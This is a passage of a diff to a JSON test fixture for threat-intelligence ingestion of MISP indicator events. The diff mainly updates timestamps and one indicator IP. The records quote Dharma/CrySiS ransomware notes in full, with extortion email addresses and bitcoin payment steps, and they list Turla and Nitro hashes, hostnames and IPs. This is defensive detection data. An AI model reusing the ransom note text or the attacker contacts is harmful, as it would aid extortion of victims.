Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#004646\",\"exportable\":true,\"hide_tag\":false,\"id\":\"21\",\"local\":0,\"name\":\"type:OSINT\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#ffffff\",\"exportable\":true,\"hide_tag\":false,\"id\":\"2\",\"local\":0,\"name\":\"tlp:white\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#2c4f00\",\"exportable\":true,\"hide_tag\":false,\"id\":\"24\",\"local\":0,\"name\":\"malware_classification:malware-category=\\\"Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#00223b\",\"exportable\":true,\"hide_tag\":false,\"id\":\"3\",\"local\":0,\"name\":\"osint:source-type=\\\"blog - post\\\"\",\"numerical_value\":null,\"user_id\":\"0\"}],\"analysis\":\"2\",\"attribute_count\":\"7\",\"date\":\"2017-08-25\",\"disable_correlation\":false,\"distribution\":\"3\",\"extends_uuid\":\"\",\"id\":\"5\",\"info\":\"OSINT - New Arena Crysis Ransomware Variant Released\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"2\",\"proposal_email_lock\":false,\"publish_timestamp\":\"1603226331\",\"published\":true,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1503930276\",\"uuid\":\"59a3d08d-5dc8-4153-bc7c-456d950d210f\"}}", + "ingested": "2021-12-09T13:49:05.849324600Z", + "original": "{\"Event\":{\"Attribute\":{\"id\":\"10794\",\"type\":\"domain|ip\",\"category\":\"Network activity\",\"to_ids\":false,\"uuid\":\"5bf30242-8ef4-4c52-a2d7-0b7b0a016219\",\"event_id\":\"14\",\"distribution\":\"5\",\"timestamp\":\"1542652482\",\"comment\":\"1st stage\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"your-ip.getmyip.com|89.160.20.156\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"EventReport\":[],\"Galaxy\":[{\"GalaxyCluster\":[{\"authors\":[\"https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"http://pastebin.com/raw/GHgpWjar\",\"MISP Project\"],\"collection_uuid\":\"10cf658b-5d32-4c4b-bb32-61760a640372\",\"description\":\"It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. CrySiS \\\\u003e Dharma Note: ATTENTION! At the moment, your system is not protected. We can fix it and restore files. To restore the system write to this address: bitcoin143@india.com. CrySiS variant\",\"galaxy_id\":\"43\",\"id\":\"6619\",\"local\":false,\"meta\":{\"date\":[\"November 2016\"],\"encryption\":[\"AES + RSA-512\"],\"extensions\":[\".dharma\",\".wallet\",\".zzzzz\",\".cmb\",\".id-BCBEF350.[paymentbtc@firemail.cc].cmb\",\".bip\",\".id-BCBEF350.[Beamsell@qq.com].bip\",\".boost\",\".[Darknes@420blaze.it].waifu\",\".brrr\",\".adobe\",\".tron\",\".AUDIT\",\".cccmn\",\".fire\",\".myjob\",\".[cyberwars@qq.com].war\",\".risk\",\".RISK\",\".bkpx\",\".[newsantaclaus@aol.com].santa\"],\"payment-method\":[\"Bitcoin - Email\"],\"ransomnotes\":[\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email paymentbtc@firemail.cc\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail paymentbtc@firemail.cc\\\\nWrite this ID in the title of your message ACBFF130\\\\nIn case of no answer in 24 hours write us to theese e-mails:paymentbtc@firemail.cc\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\\\\nhttps://localbitcoins.com/buy_bitcoins\\\\nAlso you can find other places to buy Bitcoins and beginners guide here:\\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\\\\nAttention!\\\\nDo not rename encrypted files.\\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"All your files have been encrypted!\\\\nAll your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail Beamsell@qq.com\\\\nWrite this ID in the title of your message BCBEF350\\\\nIn case of no answer in 24 hours write us to theese e-mails:Beamsell@qq.com\\\\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. \\\\nFree decryption as guarantee\\\\nBefore paying you can send us up to 1 file for free decryption. The total size of files must be less than 1Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) \\\\nHow to obtain Bitcoins\\\\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. \\\\nhttps://localbitcoins.com/buy_bitcoins \\\\nAlso you can find other places to buy Bitcoins and beginners guide here: \\\\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/ \\\\nAttention!\\\\nDo not rename encrypted files. \\\\nDo not try to decrypt your data using third party software, it may cause permanent data loss.\\\\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.\",\"all your data has been locked us\\\\nYou want to return?\\\\nwrite email Beamsell@qq.com\"],\"ransomnotes-filenames\":[\"README.txt\",\"README.jpg\",\"Info.hta\",\"FILES ENCRYPTED.txt\",\"INFO.hta\"],\"ransomnotes-refs\":[\"https://www.bleepstatic.com/images/news/ransomware/d/dharma/cmb/hta-ransom-note.jpg\",\"https://pbs.twimg.com/media/Dmof_FiXsAAAvTN.jpg\",\"https://pbs.twimg.com/media/Dmof_FyXsAEJmgQ.jpg\",\"https://pbs.twimg.com/media/DrWqLWzXgAc4SlG.jpg\",\"https://pbs.twimg.com/media/DuEBIMBW0AANnGW.jpg\"],\"refs\":[\"https://id-ransomware.blogspot.co.il/2016/11/dharma-ransomware.html\",\"https://www.bleepingcomputer.com/news/security/kaspersky-releases-decryptor-for-the-dharma-ransomware/\",\"https://www.bleepingcomputer.com/news/security/new-cmb-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/\",\"https://twitter.com/demonslay335/status/1049313390097813504\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/\",\"https://twitter.com/JakubKroustek/status/1038680437508501504\",\"https://twitter.com/demonslay335/status/1059521042383814657\",\"https://twitter.com/demonslay335/status/1059940414147489792\",\"https://twitter.com/JakubKroustek/status/1060825783197933568\",\"https://twitter.com/JakubKroustek/status/1064061275863425025\",\"https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/\",\"https://www.youtube.com/watch?v=qjoYtwLx2TI\",\"https://twitter.com/GrujaRS/status/1072139616910757888\"]},\"source\":\"Various\",\"tag_id\":\"23\",\"tag_name\":\"misp-galaxy:ransomware=\\\"Dharma Ransomware\\\"\",\"type\":\"ransomware\",\"uuid\":\"2b365b2c-4a9a-4b66-804d-3b2d2814fe7b\",\"value\":\"Dharma Ransomware\",\"version\":\"86\"}],\"description\":\"Ransomware galaxy based on https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml\",\"icon\":\"btc\",\"id\":\"43\",\"name\":\"Ransomware\",\"namespace\":\"misp\",\"type\":\"ransomware\",\"uuid\":\"3f44af2e-1480-4b6b-9aa8-f9bb21341078\",\"version\":\"4\"}],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"2\",\"local\":false,\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"RelatedEvent\":[],\"ShadowAttribute\":[],\"Tag\":[{\"colour\":\"#0088cc\",\"exportable\":true,\"hide_tag\":false,\"id\":\"23\",\"local\":0,\"name\":\"misp-galaxy:ransomware=\\\"Dharma Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#004646\",\"exportable\":true,\"hide_tag\":false,\"id\":\"21\",\"local\":0,\"name\":\"type:OSINT\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#ffffff\",\"exportable\":true,\"hide_tag\":false,\"id\":\"2\",\"local\":0,\"name\":\"tlp:white\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#2c4f00\",\"exportable\":true,\"hide_tag\":false,\"id\":\"24\",\"local\":0,\"name\":\"malware_classification:malware-category=\\\"Ransomware\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#00223b\",\"exportable\":true,\"hide_tag\":false,\"id\":\"3\",\"local\":0,\"name\":\"osint:source-type=\\\"blog - post\\\"\",\"numerical_value\":null,\"user_id\":\"0\"}],\"analysis\":\"2\",\"attribute_count\":\"7\",\"date\":\"2017-08-25\",\"disable_correlation\":false,\"distribution\":\"3\",\"extends_uuid\":\"\",\"id\":\"5\",\"info\":\"OSINT - New Arena Crysis Ransomware Variant Released\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"2\",\"proposal_email_lock\":false,\"publish_timestamp\":\"1603226331\",\"published\":true,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1503930276\",\"uuid\":\"59a3d08d-5dc8-4153-bc7c-456d950d210f\"}}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -224,7 +224,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046341539Z", + "ingested": "2021-12-09T13:49:05.849329300Z", "original": "{\"Event\":{\"Attribute\":{\"Galaxy\":[],\"ShadowAttribute\":[],\"category\":\"External analysis\",\"comment\":\"Carbon sample - Xchecked via VT: a08b8371ead1919500a4759c2f46553620d5a9d9\",\"deleted\":false,\"disable_correlation\":false,\"distribution\":\"5\",\"event_id\":\"4\",\"first_seen\":null,\"id\":\"342\",\"last_seen\":null,\"object_id\":\"0\",\"object_relation\":null,\"sharing_group_id\":\"0\",\"timestamp\":\"1490878550\",\"to_ids\":false,\"type\":\"link\",\"uuid\":\"58dd0056-6e74-43d5-b58b-494802de0b81\",\"value\":\"https://www.virustotal.com/file/7fa4482bfbca550ce296d8e791b1091d60d733ea8042167fd0eb853530584452/analysis/1486030116/\"},\"EventReport\":[],\"Galaxy\":[{\"GalaxyCluster\":[{\"authors\":[\"Alexandre Dulaunoy\",\"Florian Roth\",\"Timo Steffens\",\"Christophe Vandeplas\",\"Dennis Rand\",\"raw-data\"],\"collection_uuid\":\"0d821b68-9d82-4c6d-86a6-1071a9e0f79f\",\"description\":\"Family of related sophisticated backdoor software - Name comes from Microsoft detection signature – anagram of Ultra (Ultra3) was a name of the fake driver). A macOS version exists but appears incomplete and lacking features...for now!\",\"galaxy_id\":\"36\",\"id\":\"5828\",\"local\":false,\"meta\":{\"refs\":[\"https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf\",\"https://objective-see.com/blog/blog_0x25.html#Snake\"],\"synonyms\":[\"Snake\",\"Uroburos\",\"Urouros\"],\"type\":[\"Backdoor\",\"Rootkit\"]},\"source\":\"MISP Project\",\"tag_id\":\"22\",\"tag_name\":\"misp-galaxy:tool=\\\"Turla\\\"\",\"type\":\"tool\",\"uuid\":\"22332d52-c0c2-443c-9ffb-f08c0d23722c\",\"value\":\"Turla\",\"version\":\"138\"}],\"description\":\"Threat actors tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries.\",\"icon\":\"optin-monster\",\"id\":\"36\",\"name\":\"Tool\",\"namespace\":\"misp\",\"type\":\"tool\",\"uuid\":\"9b8037f7-bc8f-4de1-a797-37266619bc0b\",\"version\":\"3\"}],\"Object\":[],\"Org\":{\"id\":\"1\",\"local\":true,\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"2\",\"local\":false,\"name\":\"CIRCL\",\"uuid\":\"55f6ea5e-2c60-40e5-964f-47a8950d210f\"},\"RelatedEvent\":[{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"4\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\"},\"analysis\":\"2\",\"date\":\"2015-01-20\",\"distribution\":\"3\",\"id\":\"369\",\"info\":\"OSINT Analysis of Project Cobra Another extensible framework used by the Uroburos’ actors from Gdata\",\"org_id\":\"1\",\"orgc_id\":\"4\",\"published\":true,\"threat_level_id\":\"1\",\"timestamp\":\"1498163317\",\"uuid\":\"54bf5a6f-ac50-4f71-9cd3-7080950d210b\"}},{\"Event\":{\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"982f7c55-684d-4eb9-8736-fb5f668b899d\"},\"Orgc\":{\"id\":\"4\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\"},\"analysis\":\"2\",\"date\":\"2014-11-20\",\"distribution\":\"3\",\"id\":\"621\",\"info\":\"Turla digging using TotalHash\",\"org_id\":\"1\",\"orgc_id\":\"4\",\"published\":true,\"threat_level_id\":\"2\",\"timestamp\":\"1498163604\",\"uuid\":\"546daad5-425c-4ac4-82c7-e07f950d210b\"}}],\"ShadowAttribute\":[],\"Tag\":[{\"colour\":\"#065100\",\"exportable\":true,\"hide_tag\":false,\"id\":\"22\",\"local\":0,\"name\":\"misp-galaxy:tool=\\\"Turla\\\"\",\"numerical_value\":null,\"user_id\":\"0\"},{\"colour\":\"#ffffff\",\"exportable\":true,\"hide_tag\":false,\"id\":\"2\",\"local\":0,\"name\":\"tlp:white\",\"numerical_value\":null,\"user_id\":\"0\"}],\"analysis\":\"2\",\"attribute_count\":\"100\",\"date\":\"2017-03-30\",\"disable_correlation\":false,\"distribution\":\"3\",\"extends_uuid\":\"\",\"id\":\"4\",\"info\":\"OSINT - Carbon Paper: Peering into Turla’s second stage backdoor\",\"locked\":false,\"org_id\":\"1\",\"orgc_id\":\"2\",\"proposal_email_lock\":false,\"publish_timestamp\":\"1603226330\",\"published\":true,\"sharing_group_id\":\"0\",\"threat_level_id\":\"3\",\"timestamp\":\"1493403824\",\"uuid\":\"58dcfe62-ed84-4e5e-b293-4991950d210f\"}}", "category": "threat", "type": "indicator", @@ -300,7 +300,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046346579Z", + "ingested": "2021-12-09T13:49:05.849333800Z", "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1077\",\"type\":\"sha256\",\"category\":\"External analysis\",\"to_ids\":true,\"uuid\":\"54324042-49fc-4628-a95e-44da950d210b\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1412579394\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"0a1103bc90725d4665b932f88e81d39eafa5823b0de3ab146e2d4548b7da79a0\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", @@ -364,7 +364,7 @@ }, "type": "ipv4-addr", "provider": "misp", - "ip": "223.25.233.248", + "ip": "89.160.20.156", "scanner_stats": 2 }, "feed": { @@ -372,8 +372,8 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046351057Z", - "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1084\",\"type\":\"ip-dst\",\"category\":\"Network activity\",\"to_ids\":true,\"uuid\":\"54324081-3308-4f1f-8674-4953950d210b\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1412579457\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"223.25.233.248\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", + "ingested": "2021-12-09T13:49:05.849337500Z", + "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1084\",\"type\":\"ip-dst\",\"category\":\"Network activity\",\"to_ids\":true,\"uuid\":\"54324081-3308-4f1f-8674-4953950d210b\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1412579457\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"89.160.20.156\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -446,7 +446,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046355205Z", + "ingested": "2021-12-09T13:49:05.849341900Z", "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1086\",\"type\":\"hostname\",\"category\":\"Network activity\",\"to_ids\":true,\"uuid\":\"543240dc-f068-437a-baa9-48f2950d210b\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1412579548\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"xenserver.ddns.net\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", @@ -518,7 +518,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046359252Z", + "ingested": "2021-12-09T13:49:05.849345900Z", "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1089\",\"type\":\"text\",\"category\":\"External analysis\",\"to_ids\":false,\"uuid\":\"543240f9-64e8-41f2-958f-4e21950d210b\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1412579577\",\"comment\":\"\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"Nitro\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", @@ -594,7 +594,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046363170Z", + "ingested": "2021-12-09T13:49:05.849350400Z", "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks\",\"published\":true,\"uuid\":\"54323f2c-e50c-4268-896c-4867950d210b\",\"attribute_count\":\"29\",\"analysis\":\"2\",\"timestamp\":\"1412579577\",\"distribution\":\"3\",\"proposal_email_lock\":false,\"locked\":false,\"publish_timestamp\":\"1610622316\",\"sharing_group_id\":\"0\",\"disable_correlation\":false,\"extends_uuid\":\"\",\"Org\":{\"id\":\"1\",\"name\":\"ORGNAME\",\"uuid\":\"5877549f-ea76-4b91-91fb-c72ad682b4a5\",\"local\":true},\"Orgc\":{\"id\":\"2\",\"name\":\"CthulhuSPRL.be\",\"uuid\":\"55f6ea5f-fd34-43b8-ac1d-40cb950d210f\",\"local\":false},\"Attribute\":{\"id\":\"1090\",\"type\":\"sha1\",\"category\":\"External analysis\",\"to_ids\":true,\"uuid\":\"56c625a7-f31c-460c-9ea1-c652950d210f\",\"event_id\":\"2\",\"distribution\":\"5\",\"timestamp\":\"1455826343\",\"comment\":\"Automatically added (via 7915aabb2e66ff14841e4ef0fbff7486)\",\"sharing_group_id\":\"0\",\"deleted\":false,\"disable_correlation\":false,\"object_id\":\"0\",\"object_relation\":null,\"first_seen\":null,\"last_seen\":null,\"value\":\"0ea76f1586c008932d90c991dfdd5042f3aac8ea\",\"Galaxy\":[],\"ShadowAttribute\":[]},\"ShadowAttribute\":[],\"RelatedEvent\":[],\"Galaxy\":[],\"Object\":[],\"EventReport\":[],\"Tag\":[{\"id\":\"1\",\"name\":\"type:OSINT\",\"colour\":\"#004646\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0},{\"id\":\"2\",\"name\":\"tlp:green\",\"colour\":\"#339900\",\"exportable\":true,\"user_id\":\"0\",\"hide_tag\":false,\"numerical_value\":null,\"is_galaxy\":false,\"is_custom_galaxy\":false,\"local\":0}]}}", "category": "threat", "type": "indicator", @@ -668,7 +668,7 @@ } }, "event": { - "ingested": "2021-10-19T14:58:42.046380382Z", + "ingested": "2021-12-09T13:49:05.849355800Z", "original": "{\"Event\":{\"id\":\"2\",\"orgc_id\":\"2\",\"org_id\":\"1\",\"date\":\"2014-10-03\",\"threat_level_id\":\"2\",\"info\":\"OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto 